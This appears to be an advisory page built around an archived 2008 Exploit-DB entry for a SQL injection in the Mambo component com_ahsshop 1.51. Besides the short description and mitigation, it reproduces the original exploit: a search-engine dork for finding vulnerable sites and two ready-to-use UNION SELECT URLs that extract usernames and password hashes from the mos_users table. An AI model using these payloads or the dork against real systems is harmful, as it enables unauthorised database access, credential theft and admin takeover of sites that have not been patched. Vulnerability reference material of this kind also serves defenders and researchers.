Mambo Component com_ahsshop SQL Injection

vendor:

ahsshop

by:

S@BUN

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: ahsshop

Affected Version From: 1.51

Affected Version To: 1.51

Patch Exists: NO

Related CWE: N/A

CPE: a:netvistun:ahsshop

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Mambo Component com_ahsshop SQL Injection

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'vara' parameter of the 'index.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. This can be exploited to bypass authentication and gain access to the application with administrative privileges.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

##########################################
#
# Mambo Component com_ahsshop SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAiL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: "com_ahsshop"do=default
#
###########################################
EXPLOiT 1 :

index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,3,4,0x3a,6,0x3a/**/from/**/mos_users/*

EXPLOiT 2 :

index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/concat(username,0x3a,password),1/**/from/**/mos_users/*


###########################################
------------------S@BUN-------------------#
###########################################
-----hackturkiye.hackturkiye@gmail.com----#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################

side note:
	<name>ahsshop</name>
	<creationDate>15.07.2004</creationDate>
	<author>Arnï¿½r Heiï¿½ar fyrir Netvistun ehf.</author>
	<copyright>Allur hï¿½fundarrï¿½ttur ï¿½skilinn</copyright>
	<authorEmail>arnor@netvistun.is</authorEmail>

	<authorUrl>www.netvistun.is</authorUrl>
	<version>1.51</version>
	<description>Kerfi ï¿½tlaï¿½ til aï¿½ kynna vï¿½rur og vï¿½ruflokka eftir verï¿½um</description>

# milw0rm.com [2008-04-01]